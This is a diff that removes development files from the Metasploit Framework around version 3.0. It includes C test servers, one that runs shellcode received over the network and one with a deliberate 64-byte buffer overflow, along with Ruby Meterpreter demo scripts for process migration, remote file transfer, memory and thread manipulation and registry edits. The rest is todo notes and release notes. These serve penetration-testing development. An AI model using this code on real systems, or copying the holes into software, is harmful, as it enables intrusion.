funct = (int (*)()) buf;
|
||||
(int)(*funct)();
|
||||
|
||||
return (0);
|
||||
|
||||
}
|
||||
|
||||
|
|
@ -1,123 +0,0 @@
|
|||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <errno.h>
|
||||
|
||||
#if defined _WIN32
|
||||
#include <winsock2.h>
|
||||
#pragma comment(lib, "ws2_32.lib")
|
||||
#else
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <netdb.h>
|
||||
#include <unistd.h>
|
||||
#endif
|
||||
|
||||
#define SERVER_PORT 5432
|
||||
#define MAX_PENDING 1
|
||||
|
||||
|
||||
int ehlo, from;
|
||||
|
||||
/* Main function */
|
||||
|
||||
void Runner(int new_s);
|
||||
|
||||
int main(int argc, char **argv) {
|
||||
struct sockaddr_in sin;
|
||||
char buf[8092], *ptr;
|
||||
int c, i, len, port;
|
||||
int s, new_s, bytes;
|
||||
#if defined _WIN32
|
||||
int wsaret;
|
||||
WSADATA wsaData;
|
||||
#endif
|
||||
int (*funct)();
|
||||
|
||||
|
||||
/* Command line parameters */
|
||||
if (argv[1])
|
||||
port = atoi(argv[1]);
|
||||
else
|
||||
port = SERVER_PORT;
|
||||
|
||||
#if defined _WIN32
|
||||
/* Initialize winsock */
|
||||
wsaret = WSAStartup(0x101, &wsaData);
|
||||
if(wsaret != 0)
|
||||
return (0);
|
||||
|
||||
/* Create a socket */
|
||||
if ((s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) < 0) {
|
||||
fprintf(stderr, "%s: WSASocket - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
#else
|
||||
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
|
||||
fprintf(stderr, "%s: socket - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
#endif
|
||||
|
||||
/* Initialize the addres data structure */
|
||||
memset((void *)&sin, 0, sizeof(sin));
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = INADDR_ANY;
|
||||
sin.sin_port = htons(port);
|
||||
|
||||
/* Bind an address to the socket */
|
||||
if (bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
|
||||
fprintf(stderr, "%s: bind - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
/* Set the length of the listen queue */
|
||||
if (listen(s, MAX_PENDING) < 0) {
|
||||
fprintf(stderr, "%s: listen - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
|
||||
while (1)
|
||||
{
|
||||
__try
|
||||
{
|
||||
len = sizeof(sin);
|
||||
new_s = accept(s, (struct sockaddr *)&sin, &len);
|
||||
|
||||
CloseHandle(CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Runner, (void *)new_s, 0, NULL));
|
||||
|
||||
} __except(EXCEPTION_EXECUTE_HANDLER)
|
||||
{
|
||||
fprintf(stderr, "Got exception: %lu\n", GetExceptionCode());
|
||||
}
|
||||
}
|
||||
|
||||
return (0);
|
||||
|
||||
}
|
||||
|
||||
void Runner(int new_s)
|
||||
{
|
||||
char buf[8092];
|
||||
int len;
|
||||
int bytes;
|
||||
int (*funct)();
|
||||
|
||||
__try
|
||||
{
|
||||
memset(buf, 0, sizeof(buf));
|
||||
bytes = recv(new_s, buf, sizeof(buf), 0);
|
||||
|
||||
printf("recv'd %d\n", bytes);
|
||||
|
||||
__asm mov edi, new_s
|
||||
|
||||
funct = (int (*)()) buf;
|
||||
(int)(*funct)();
|
||||
} __except(EXCEPTION_EXECUTE_HANDLER)
|
||||
{
|
||||
fprintf(stderr, "Got exception: %lu\n", GetExceptionCode());
|
||||
}
|
||||
}
|
|
@ -1,119 +0,0 @@
|
|||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <errno.h>
|
||||
//#include <windows.h>
|
||||
|
||||
#if defined _WIN32
|
||||
#include <winsock2.h>
|
||||
#pragma comment(lib, "ws2_32.lib")
|
||||
#else
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <netdb.h>
|
||||
#include <unistd.h>
|
||||
#endif
|
||||
|
||||
#define SERVER_PORT 5432
|
||||
#define MAX_PENDING 1
|
||||
|
||||
|
||||
int ehlo, from;
|
||||
|
||||
/* Main function */
|
||||
|
||||
void Runner(int new_s);
|
||||
|
||||
int main(int argc, char **argv) {
|
||||
struct sockaddr_in sin;
|
||||
char buf[8092], *ptr;
|
||||
int c, i, len, port;
|
||||
int s, new_s, bytes;
|
||||
#if defined _WIN32
|
||||
int wsaret;
|
||||
WSADATA wsaData;
|
||||
#endif
|
||||
int (*funct)();
|
||||
|
||||
|
||||
/* Command line parameters */
|
||||
if (argv[1])
|
||||
port = atoi(argv[1]);
|
||||
else
|
||||
port = SERVER_PORT;
|
||||
|
||||
#if defined _WIN32
|
||||
/* Initialize winsock */
|
||||
wsaret = WSAStartup(0x101, &wsaData);
|
||||
if(wsaret != 0)
|
||||
return (0);
|
||||
|
||||
/* Create a socket */
|
||||
if ((s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) < 0) {
|
||||
fprintf(stderr, "%s: WSASocket - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
#else
|
||||
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
|
||||
fprintf(stderr, "%s: socket - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
#endif
|
||||
|
||||
/* Initialize the addres data structure */
|
||||
memset((void *)&sin, 0, sizeof(sin));
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = INADDR_ANY;
|
||||
sin.sin_port = htons(port);
|
||||
|
||||
/* Bind an address to the socket */
|
||||
if (bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
|
||||
fprintf(stderr, "%s: bind - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
/* Set the length of the listen queue */
|
||||
if (listen(s, MAX_PENDING) < 0) {
|
||||
fprintf(stderr, "%s: listen - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
|
||||
while (1)
|
||||
{
|
||||
__try
|
||||
{
|
||||
len = sizeof(sin);
|
||||
new_s = accept(s, (struct sockaddr *)&sin, &len);
|
||||
|
||||
CloseHandle(CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Runner, (void *)new_s, 0, NULL));
|
||||
|
||||
} __except(EXCEPTION_EXECUTE_HANDLER)
|
||||
{
|
||||
fprintf(stderr, "Got exception: %lu\n", GetExceptionCode());
|
||||
}
|
||||
}
|
||||
|
||||
return (0);
|
||||
|
||||
}
|
||||
|
||||
void RunnerStuff(int sock)
|
||||
{
|
||||
char buf[64];
|
||||
int bytes;
|
||||
|
||||
bytes = recv(sock, buf, 3048, 0);
|
||||
|
||||
printf("recv'd %d\n", bytes);
|
||||
}
|
||||
|
||||
void Runner(int new_s)
|
||||
{
|
||||
char buf[4096];
|
||||
|
||||
RunnerStuff(new_s);
|
||||
|
||||
fprintf(stderr, "done");
|
||||
}
|
18
dev/merge.sh
|
@ -1,18 +0,0 @@
|
|||
#!/bin/sh
|
||||
|
||||
export DEV=/projects/metasploit/framework3/trunk/
|
||||
export SBL=/projects/metasploit/framework3/tags/framework-3.0/
|
||||
export FIL=$1
|
||||
|
||||
echo "[*] Gathering svn information..."
|
||||
TMP=`tempfile mergeXXXXXXX`
|
||||
svn log --limit 1 "${DEV}${FIL}" | egrep -v '^r[0-9]+|^--|^$' > $TMP
|
||||
|
||||
echo "[*] Copying file ${FIL}..."
|
||||
cp ${DEV}${FIL} ${SBL}${FIL}
|
||||
|
||||
echo "[*] Merging file ${FIL}..."
|
||||
svn add ${SBL}${FIL} >/dev/null 2>&1
|
||||
svn commit --non-interactive -F $TMP ${SBL}${FIL}
|
||||
|
||||
rm -f $TMP
|
|
@ -1,19 +0,0 @@
|
|||
#!/usr/bin/env ruby -I../../lib
|
||||
|
||||
require 'Rex/Post'
|
||||
|
||||
class DemoClient
|
||||
|
||||
def initialize(host, port)
|
||||
self.sock = TCPSocket.new(host, port)
|
||||
self.client = Rex::Post::Meterpreter::Client.new(sock)
|
||||
|
||||
self.client.core.use('Stdapi')
|
||||
end
|
||||
|
||||
attr_reader :client
|
||||
protected
|
||||
attr_accessor :sock
|
||||
attr_writer :client
|
||||
|
||||
end
|
|
@ -1,5 +0,0 @@
|
|||
<html>
|
||||
<center>
|
||||
<h1>Metasploit Post-Exploitation Demo</h1>
|
||||
</center>
|
||||
</html>
|
|
@ -1,19 +0,0 @@
|
|||
#!/usr/bin/env ruby -I. -I../../lib
|
||||
|
||||
require 'DemoClient'
|
||||
|
||||
host = ARGV[0] || '127.0.0.1'
|
||||
port = ARGV[1] || '12345'
|
||||
client = DemoClient.new(host, port).client
|
||||
|
||||
pid = client.sys.process['calc.exe']
|
||||
|
||||
puts "before migrate: my pid is #{client.sys.process.getpid}"
|
||||
|
||||
client.core.migrate(pid)
|
||||
|
||||
puts "after migrate: my pid is #{client.sys.process.getpid}"
|
||||
|
||||
while (1)
|
||||
select nil, nil, nil, 5
|
||||
end
|
|
@ -1,16 +0,0 @@
|
|||
#!/usr/bin/env ruby -I. -I../../lib
|
||||
|
||||
require 'DemoClient'
|
||||
|
||||
host = ARGV[0] || '127.0.0.1'
|
||||
port = ARGV[1] || '12345'
|
||||
src_dir = ARGV[2] || "%WINDIR%\\inf"
|
||||
dst_dir = ARGV[3] || "/tmp/mirror_demo"
|
||||
client = DemoClient.new(host, port).client
|
||||
|
||||
begin
|
||||
Dir.mkdir(dst_dir)
|
||||
rescue
|
||||
end
|
||||
|
||||
client.fs.dir.download(dst_dir, src_dir, true)
|
|
@ -1,16 +0,0 @@
|
|||
#!/usr/bin/env ruby -I. -I../../lib
|
||||
|
||||
require 'DemoClient'
|
||||
|
||||
host = ARGV[0] || '127.0.0.1'
|
||||
port = ARGV[1] || '12345'
|
||||
src_dir = ARGV[2] || "/tmp/mirror_src_demo"
|
||||
dst_dir = ARGV[3] || "c:\\personal\\temp\\dst_mirror"
|
||||
client = DemoClient.new(host, port).client
|
||||
|
||||
begin
|
||||
client.fs.dir.mkdir(dst_dir)
|
||||
rescue
|
||||
end
|
||||
|
||||
client.fs.dir.upload(dst_dir, src_dir, true)
|
|
@ -1,13 +0,0 @@
|
|||
#!/usr/bin/env ruby -I. -I../../lib
|
||||
|
||||
require 'DemoClient'
|
||||
|
||||
HTML_FILE = "demo1.html"
|
||||
|
||||
host = ARGV[0] || '127.0.0.1'
|
||||
port = ARGV[1] || '12345'
|
||||
client = DemoClient.new(host, port).client
|
||||
|
||||
client.fs.file.upload('%TEMP%', HTML_FILE)
|
||||
|
||||
client.sys.process.execute('cmd /C "explorer %TEMP%\demo1.html"')
|
|
@ -1,39 +0,0 @@
|
|||
#!/usr/bin/env ruby -I. -I../../lib
|
||||
|
||||
require 'DemoClient'
|
||||
require 'Rex/Socket/Parameters'
|
||||
|
||||
host = ARGV[0] || '127.0.0.1'
|
||||
port = ARGV[1] || '12345'
|
||||
client = DemoClient.new(host, port).client
|
||||
|
||||
# Create a parameter representation class based on the perl-style hash
|
||||
# elements
|
||||
params = Rex::Socket::Parameters.new(
|
||||
'PeerHost' => '128.242.160.3',
|
||||
'PeerPort' => 25,
|
||||
'Proto' => 'tcp')
|
||||
|
||||
# Create the socket for this connection
|
||||
socket = client.net.socket.create(params)
|
||||
|
||||
# Send GET / HTTP/1.0
|
||||
socket.send("HELO hick.org\r\n")
|
||||
|
||||
data = socket.recv
|
||||
|
||||
puts "#{data}"
|
||||
|
||||
socket.send("QUIT\r\n")
|
||||
|
||||
socket.sock.shutdown(1)
|
||||
|
||||
while ((data = socket.recv) != nil)
|
||||
puts "#{data}"
|
||||
end
|
||||
|
||||
puts "Finished"
|
||||
|
||||
#while (1)
|
||||
# select nil, nil, nil, 5
|
||||
#end
|
|
@ -1,361 +0,0 @@
|
|||
#!/usr/bin/env ruby -I../../lib
|
||||
|
||||
require 'Rex/Post'
|
||||
|
||||
netconf = false
|
||||
ui = false
|
||||
net = false
|
||||
fseek = false
|
||||
dir = false
|
||||
process = true
|
||||
registry = false
|
||||
copy = false
|
||||
|
||||
sock = TCPSocket.new('127.0.0.1', 12345)
|
||||
client = Rex::Post::Meterpreter::Client.new(sock)
|
||||
|
||||
client.core.use(
|
||||
'Stdapi')
|
||||
|
||||
puts "Client interface:"
|
||||
client.dump_extension_tree.each { |x|
|
||||
puts "\t#{x}"
|
||||
}
|
||||
puts "\n\n"
|
||||
|
||||
if (net)
|
||||
s = client.net.create_channel(
|
||||
'PeerHost' => '128.242.160.3',
|
||||
'PeerPort' => '80',
|
||||
'Proto' => 'tcp')
|
||||
|
||||
puts "writing 'GET / HTTP/1.0'..."
|
||||
s.write("GET / HTTP/1.0\r\n\r\n")
|
||||
puts "reading in 20 bytes from the socket:\n#{s.read(20)}"
|
||||
|
||||
s.close
|
||||
end
|
||||
|
||||
if (copy)
|
||||
|
||||
puts "Uploading...\n"
|
||||
client.fs.file.upload("c:\\personal\\temp\\mirror", "/bin/cat", "/tmp/dog")
|
||||
|
||||
puts "Downloading...\n"
|
||||
client.fs.file.download("/tmp/test", "c:\\personal\\temp\\ati3duag.dll",
|
||||
"c:\\personal\\temp\\blah.asm", "c:\\personal\\temp\\boa.tar.gz")
|
||||
|
||||
end
|
||||
|
||||
if (netconf)
|
||||
|
||||
puts "Routes:\n\n"
|
||||
client.net.config.each_route { |route|
|
||||
puts route.pretty
|
||||
}
|
||||
|
||||
puts "\n\nInterfaces:\n\n"
|
||||
|
||||
client.net.config.each_interface { |interface|
|
||||
puts interface.pretty
|
||||
}
|
||||
|
||||
client.net.config.add_route('1.2.3.4', '255.255.255.255', '127.0.0.1')
|
||||
puts "after adding 1.2.3.4 route\n\n"
|
||||
client.net.config.each_route { |route|
|
||||
puts route.pretty
|
||||
}
|
||||
client.net.config.remove_route('1.2.3.4', '255.255.255.255', '127.0.0.1')
|
||||
puts "after removing 1.2.3.4 route\n\n"
|
||||
client.net.config.each_route { |route|
|
||||
puts route.pretty
|
||||
}
|
||||
|
||||
end
|
||||
|
||||
if (ui)
|
||||
input = false
|
||||
|
||||
puts "idle time: #{client.ui.idle_time}"
|
||||
|
||||
sleep 60
|
||||
|
||||
puts "idle time: #{client.ui.idle_time}"
|
||||
|
||||
if (input)
|
||||
puts "disabling"
|
||||
# client.ui.disable_keyboard
|
||||
client.ui.disable_mouse
|
||||
|
||||
sleep 60
|
||||
|
||||
puts "enabling"
|
||||
# client.ui.enable_keyboard
|
||||
client.ui.enable_mouse
|
||||
puts "done"
|
||||
end
|
||||
end
|
||||
|
||||
if (fseek)
|
||||
f = client.fs.file.new("c:\\personal\\temp\\hm.c")
|
||||
|
||||
puts "current position: #{f.tell}"
|
||||
puts "some text:\n#{f.read}"
|
||||
puts "current position: #{f.tell}"
|
||||
f.seek(0, IO::SEEK_SET)
|
||||
puts "current position: #{f.tell}"
|
||||
puts "some text again:\n#{f.read}"
|
||||
f.seek(40, IO::SEEK_SET)
|
||||
puts "eof? #{f.eof}"
|
||||
puts "current position: #{f.tell}"
|
||||
puts "some text again:\n#{f.read}"
|
||||
begin
|
||||
puts "some text again:\n#{f.read}"
|
||||
puts "some text again:\n#{f.read}"
|
||||
rescue EOFError
|
||||
puts "got eof"
|
||||
rescue
|
||||
puts "got other"
|
||||
end
|
||||
puts "eof? #{f.eof}"
|
||||
|
||||
end
|
||||
|
||||
if (dir)
|
||||
puts "Testing dir...\n\n"
|
||||
|
||||
puts "%WINDIR% is #{client.fs.file.expand_path('%WINDIR%')}"
|
||||
|
||||
puts "Getting contents of C:\\"
|
||||
|
||||
client.fs.dir.foreach("C:\\") { |name|
|
||||
puts "\t#{name}\n"
|
||||
}
|
||||
|
||||
puts "working directory: #{client.fs.dir.pwd}"
|
||||
client.fs.dir.chdir("..")
|
||||
puts "working directory: #{client.fs.dir.getwd}"
|
||||
client.fs.dir.chdir("c:\\windows")
|
||||
puts "working directory: #{client.fs.dir.pwd}"
|
||||
client.fs.dir.mkdir("c:\\personal\\temp\\tester")
|
||||
client.fs.dir.unlink("c:\\personal\\temp\\tester")
|
||||
|
||||
s = client.fs.filestat.new("C:\\Windows\\notepad.exe")
|
||||
|
||||
puts s.pretty
|
||||
|
||||
puts client.fs.file.stat("C:\\windows\\notepad.exe").mtime
|
||||
|
||||
# open a file and read in some text
|
||||
f = client.fs.file.new("C:\\personal\\temp\\hm.c")
|
||||
|
||||
puts "some text:\n #{f.read}"
|
||||
|
||||
f.close
|
||||
end
|
||||
|
||||
if (process)
|
||||
puts "Testing process...\n\n"
|
||||
|
||||
puts "exploited pid is #{client.sys.process.getpid}"
|
||||
puts "exploited name is #{client.sys.process.open.name}"
|
||||
puts "exploited path is #{client.sys.process.open.path}"
|
||||
|
||||
##
|
||||
#
|
||||
# enumeration testing
|
||||
#
|
||||
##
|
||||
debug_pid = client.sys.process['calc.exe']
|
||||
|
||||
puts "pid of calc.exe is #{debug_pid}"
|
||||
|
||||
#client.sys.process.kill(debug_pid)
|
||||
|
||||
##
|
||||
#
|
||||
# Load a library in another process
|
||||
#
|
||||
##
|
||||
|
||||
p = client.sys.process.open(debug_pid)
|
||||
base = p.image.load('zipfldr.dll')
|
||||
|
||||
printf "loaded zipfldr.dll into #{p.pid} at %.8x\n", base
|
||||
|
||||
addr = p.image.get_procedure_address('zipfldr.dll', 'RouteTheCall')
|
||||
|
||||
printf "addr of RouteTheCall is: %.8x\n", addr
|
||||
|
||||
p.image.unload(base)
|
||||
|
||||
puts "unloaded it"
|
||||
|
||||
##
|
||||
#
|
||||
# Execution
|
||||
#
|
||||
##
|
||||
|
||||
p = client.sys.process.execute("cmd.exe", nil,
|
||||
{
|
||||
'Channelized' => true
|
||||
})
|
||||
|
||||
d = p.io.read
|
||||
|
||||
puts "read from cmd.exe:\n#{d}"
|
||||
|
||||
p.io.write("dir\n")
|
||||
|
||||
d = p.io.read
|
||||
|
||||
puts "read from cmd.exe:\n#{d}"
|
||||
|
||||
##
|
||||
#
|
||||
# threads
|
||||
#
|
||||
##
|
||||
p = client.sys.process.open(debug_pid)
|
||||
|
||||
p.thread.each_thread { |id|
|
||||
puts "thread id: #{id}"
|
||||
|
||||
thread = p.thread.open(id)
|
||||
|
||||
puts "suspending..."
|
||||
thread.suspend
|
||||
puts "registers:\n"
|
||||
puts thread.pretty_regs
|
||||
thread.set_regs(
|
||||
'eax' => 0x41414141,
|
||||
'ebx' => 0xdeadbeef)
|
||||
puts thread.pretty_regs
|
||||
puts "resuming..."
|
||||
thread.resume
|
||||
puts "closing..."
|
||||
thread.close
|
||||
}
|
||||
|
||||
##
|
||||
#
|
||||
# code injection
|
||||
#
|
||||
##
|
||||
|
||||
#buf = p.memory.allocate(400)
|
||||
#p.memory.write(buf, "\xcc")
|
||||
#p.thread.create(buf)
|
||||
#p.close
|
||||
##
|
||||
#
|
||||
# image testing
|
||||
#
|
||||
##
|
||||
|
||||
exp = client.sys.process.open
|
||||
|
||||
addr = exp.image.load('wininet.dll')
|
||||
printf "wininet.dll is loaded at: %.8x\n", addr
|
||||
|
||||
exp.image.unload(addr)
|
||||
|
||||
printf "LoadLibraryA is at: %.8x\n", exp.image.get_procedure_address('kernel32.dll', 'LoadLibraryA')
|
||||
|
||||
printf "ntdll.dll base is at: %.8x\n", exp.image['ntdll.dll']
|
||||
|
||||
##
|
||||
#
|
||||
# memory testing
|
||||
#
|
||||
##
|
||||
|
||||
p = client.sys.process.open(debug_pid, PROCESS_ALL)
|
||||
|
||||
addr = p.memory.allocate(400, PROT_WRITE | PROT_READ)
|
||||
|
||||
printf "allocated memory at %.8x\n", addr
|
||||
|
||||
p.memory.write(addr, 'this is a test yo')
|
||||
|
||||
data = p.memory.read(addr, 10)
|
||||
|
||||
printf "read memory from %.8x (#{data.length}): #{data.to_s}\n", addr
|
||||
|
||||
info = p.memory.query(addr)
|
||||
|
||||
printf "addr: %.8x (size=%d, prot=%.8x)\n", addr, info['RegionSize'], info['Protect']
|
||||
|
||||
if (p.memory.writable?(addr))
|
||||
puts "memory is writable like it should be\n"
|
||||
end
|
||||
|
||||
p.memory.protect(addr, info['RegionSize'], PROT_READ)
|
||||
|
||||
if (!p.memory.writable?(addr))
|
||||
puts "memory is NOT writable like it should be\n"
|
||||
else
|
||||
puts "memory is writable but it should not be\n"
|
||||
end
|
||||
|
||||
begin
|
||||
p.memory.write(addr, 'test again')
|
||||
rescue
|
||||
puts "caught exception like expected during write #{$!}"
|
||||
end
|
||||
|
||||
p.close
|
||||
|
||||
# attach to the exploited process
|
||||
exp = client.sys.process.open
|
||||
|
||||
addr = exp.memory.allocate(400, PROT_WRITE)
|
||||
|
||||
exp.memory.lock(addr, 4096)
|
||||
exp.memory.unlock(addr, 4096)
|
||||
|
||||
exp.close
|
||||
|
||||
end
|
||||
|
||||
if (registry)
|
||||
puts "Testing registry...\n\n"
|
||||
|
||||
regkey = client.sys.registry.open_key(HKEY_CURRENT_USER,
|
||||
'Software', KEY_ALL_ACCESS)
|
||||
|
||||
puts "hkey is #{regkey.hkey}"
|
||||
|
||||
regkey.set_value('test123', REG_SZ, 'yo what up')
|
||||
regkey.set_value('testdword', REG_DWORD, '666')
|
||||
|
||||
val = regkey.query_value('test123')
|
||||
val2 = regkey.query_value('testdword')
|
||||
|
||||
puts "value name: #{val.name} type: #{val.type} data: '#{val.data}'"
|
||||
puts "value name: #{val2.name} type: #{val2.type} data: '#{val2.data}'"
|
||||
|
||||
val.set('ho ho ho')
|
||||
val.delete
|
||||
|
||||
regkey.enum_key.each { |key|
|
||||
puts "child key: #{key}"
|
||||
}
|
||||
|
||||
regkey.enum_value.each { |value|
|
||||
puts "child value: #{value.name}"
|
||||
}
|
||||
|
||||
k = regkey.create_key('TestKey')
|
||||
k.close
|
||||
regkey.delete_key('TestKey')
|
||||
|
||||
regkey.close
|
||||
end
|
||||
|
||||
while (true)
|
||||
printf("sup\n")
|
||||
|
||||
select nil, nil, nil, 4
|
||||
end
|
|
@ -1,22 +0,0 @@
|
|||
#!/usr/bin/env ruby
|
||||
|
||||
$: << 'lib' << '../lib' << '../../lib'
|
||||
|
||||
require 'socket'
|
||||
require 'rex'
|
||||
require 'rex/post/meterpreter'
|
||||
|
||||
if(ARGV.length != 2)
|
||||
puts "usage: <ip> <port>"
|
||||
exit(1)
|
||||
end
|
||||
|
||||
sock = TCPSocket.new(ARGV[0], ARGV[1])
|
||||
|
||||
c = Rex::Post::Meterpreter::Client.new(sock)
|
||||
|
||||
c.core.use('Stdapi')
|
||||
|
||||
@c = c
|
||||
|
||||
irb
|
|
@ -1,6 +0,0 @@
|
|||
|
||||
- make it so packet dispatcher does not wait if timeout is 0
|
||||
|
||||
- priv
|
||||
- add commands to search out efs files and download them
|
||||
|
|
@ -1,30 +0,0 @@
|
|||
This file contains things that need to be done that aren't in the plan:
|
||||
|
||||
- revisit pivoting
|
||||
- connections seemed slow
|
||||
- data transfers seemed slow
|
||||
|
||||
Buggies:
|
||||
|
||||
- An exploit that has Compat = -find in the Payload section will still list
|
||||
meterpreter's find_tag payload as compatible
|
||||
|
||||
- The target info should provide a packing function that matches the arch and
|
||||
platform set in the target. Right now all exploits are calling big or little
|
||||
packers on the target, regardless of the target arch.
|
||||
|
||||
- If the Authors is supplied as an array, with only a single author, and
|
||||
that author isnt in the known list, a crash will occur.
|
||||
|
||||
./user_interfaces/../lib/rex/ui/text/dispatcher_shell.rb:184:in `run_command'
|
||||
./user_interfaces/../lib/rex/transformer.rb:30:in `transform'
|
||||
./user_interfaces/../lib/rex/transformer.rb:29:in `transform'
|
||||
./user_interfaces/../lib/msf/core/module/author.rb:29:in `transform'
|
||||
./user_interfaces/../lib/msf/core/module.rb:108:in `initialize'
|
||||
./user_interfaces/../lib/msf/core/exploit.rb:170:in `initialize'
|
||||
./user_interfaces/../lib/msf/core/exploit/tcp.rb:16:in `initialize'
|
||||
./user_interfaces/../lib/msf/core/exploit/ftp.rb:19:in `initialize'
|
||||
/home/projects/metasploit/rubyhacks/modules/exploits/windows/ftp/freeftpd_user.rb:62:in `initialize'
|
||||
./user_interfaces/../lib/msf/core/module_manager.rb:47:in `create'
|
||||
./user_interfaces/../lib/msf/core/module_manager.rb:251:in `create'
|
||||
./user_interfaces/../lib/msf/ui/console/command_dispatcher/core.rb:871:in `cmd_use'
|
|
@ -1,18 +0,0 @@
|
|||
msf/core
|
||||
- encoding is slow sometimes, profile it
|
||||
|
||||
meterpreter
|
||||
- migration sometimes does partial reads of stages leading to crashes
|
||||
- should switch to inlined staging in request packet
|
||||
|
||||
msfconsole
|
||||
- jobs -k on the same exploit twice leads to exception
|
||||
|
||||
|
||||
win32 bugs
|
||||
|
||||
- 'gets' blocks
|
||||
- http://blade.nagaokaut.ac.jp/cgi-bin/scat.rb/ruby/ruby-talk/151367
|
||||
- works in cmd.exe
|
||||
- does not work in rxvt (kbhit just keeps returning 0)
|
||||
X - no HOME variable by default -- need to use another directory
|
|
@ -1,53 +0,0 @@
|
|||
Major subsystems
|
||||
----------------
|
||||
|
||||
rex (lib/rex)
|
||||
|
||||
Contains generic classes that are used by various libraries
|
||||
and by framework-core and other subsystems.
|
||||
|
||||
framework-core (lib/msf/core)
|
||||
|
||||
Provides the interface for interacting with modules, managing
|
||||
sessions, and coordinating exploitation.
|
||||
|
||||
framework-base (lib/msf/base)
|
||||
|
||||
Implementations of the default sessions included in the
|
||||
framework, such as Meterpreter, and other various elements
|
||||
that are outside of the scope of framework-core. This
|
||||
subsystem also provides a simple wrapper to framework-core
|
||||
insofar as dealing with exploitation, encoding, payload,
|
||||
and session interaction.
|
||||
|
||||
Dependencies
|
||||
------------
|
||||
|
||||
+------------------+
|
||||
| Rex |
|
||||
+------------------+
|
||||
^
|
||||
|
|
||||
|
|
||||
|
|
||||
+------------------+
|
||||
| framework-core |
|
||||
+------------------+
|
||||
^
|
||||
|
|
||||
|
|
||||
|
|
||||
+------------------+
|
||||
| framework-base |
|
||||
+------------------+
|
||||
^ ^
|
||||
/ \
|
||||
/ \
|
||||
/ \
|
||||
+-----------------+ +-----------------+
|
||||
| user interface | | modules |
|
||||
+-----------------+ +-----------------+
|
||||
| msfconsole | | encoders |
|
||||
| msfweb | | exploits |
|
||||
| msfgtk | | payloads |
|
||||
+-----------------+ +-----------------+
|
|
@ -1,7 +0,0 @@
|
|||
|
||||
|
||||
-= Logging
|
||||
|
||||
The following descriptions explain when each log level should be used.
|
||||
|
||||
|
|
@ -1,22 +0,0 @@
|
|||
- meterpreter
|
||||
- many more advanced commands
|
||||
- in-memory process migration
|
||||
- disable/enable user input (keyboard/mouse)
|
||||
- check remote idle time
|
||||
- pivot through hosts
|
||||
- interact with processes, threads, files, and the registry
|
||||
- load DLLs into remote processes
|
||||
- dump SAM database hashes
|
||||
- irb mode
|
||||
- msfconsole
|
||||
- multiple concurrent sessions
|
||||
- session backgrounding
|
||||
- exploit backgrounding
|
||||
- multiple concurrent exploits
|
||||
- especially useful for passive exploits, like clientside bugs
|
||||
- irb mode
|
||||
- msfopcode
|
||||
- new command line interface to opcode db
|
||||
- msfd
|
||||
- daemonized version of msfconsole
|
||||
- all clients share the same framework instance
|
|
@ -1,111 +0,0 @@
|
|||
The Metasploit staff is proud to present the 3.0 alpha release of the Metasploit
|
||||
Framework. This release marks a major milestone in the evolution of the
|
||||
framework, and it's one that the staff hopes will push the framework into even
|
||||
wider acceptance. The major differences between the 3.0 version of the
|
||||
framework and prior versions center around one basic goal: automation. It has
|
||||
become clear that the processes involved in performing a penetration test are
|
||||
generally monotonous and could be easily streamlined, at least in part. For
|
||||
that reason, many aspects of the framework have been designed with a focus on
|
||||
making it easy for the builtin code to be easy to work with at a scripting
|
||||
level. Furthermore, a keen interest has been put into making it possible to
|
||||
augment and extend the framework's functionality beyond the scope to which it
|
||||
has already been applied.
|
||||
|
||||
While this high-level description of the enhancements offerred by the 3.0
|
||||
version may be fairly abstract, a number of particularly interesting
|
||||
enhancements can be shown to give the impression of just what's in store.
|
||||
|
||||
== The Console Interface
|
||||
|
||||
The Metasploit console interface, msfconsole, has roughly the same look and feel,
|
||||
but some of the more notable changes include:
|
||||
|
||||
- Backgrounded exploits
|
||||
|
||||
It's now possible to execute an exploit in the background. This means you
|
||||
can have an exploit that triggers a passive vulnerability (such as a browser
|
||||
bug) while aggressively doing other tasks.
|
||||
|
||||
- Multi-session exploits
|
||||
|
||||
Unlike the 2.x version of the framework, the 3.0 version is capable of
|
||||
creating multiple sessions from a single exploit. This is especially useful
|
||||
in the context of passive exploits that can have multiple clients
|
||||
connecting.
|
||||
|
||||
- Multiple concurrent sessions
|
||||
|
||||
It is possible to have more than one active session established.
|
||||
|
||||
- IRB mode
|
||||
|
||||
Like Meterpreter, the console interface supports dropping into a ruby
|
||||
scripting interface that makes it possible to directly interact with the
|
||||
framework. This makes it possible to do low-level interaction with
|
||||
sessions and framework modules.
|
||||
|
||||
== The Meterpreter
|
||||
|
||||
The meterpreter that is included in the 3.0 version of the framework is almost
|
||||
nothing like what exists in the 2.0 version. The underlying architecture and
|
||||
design remains the same, but the feature set and interface has been greatly
|
||||
enhanced to not only make scripting the post-exploitation process possible but
|
||||
to also increase the level of functionality. Instead of having separate modules
|
||||
for each of the major subsystems (Fs, Process, Net, Sys), the 3.0 version of the
|
||||
meterpreter has merged all of these common elements into one extension called
|
||||
Stdapi, short for the Standard API. This API provides access to the file
|
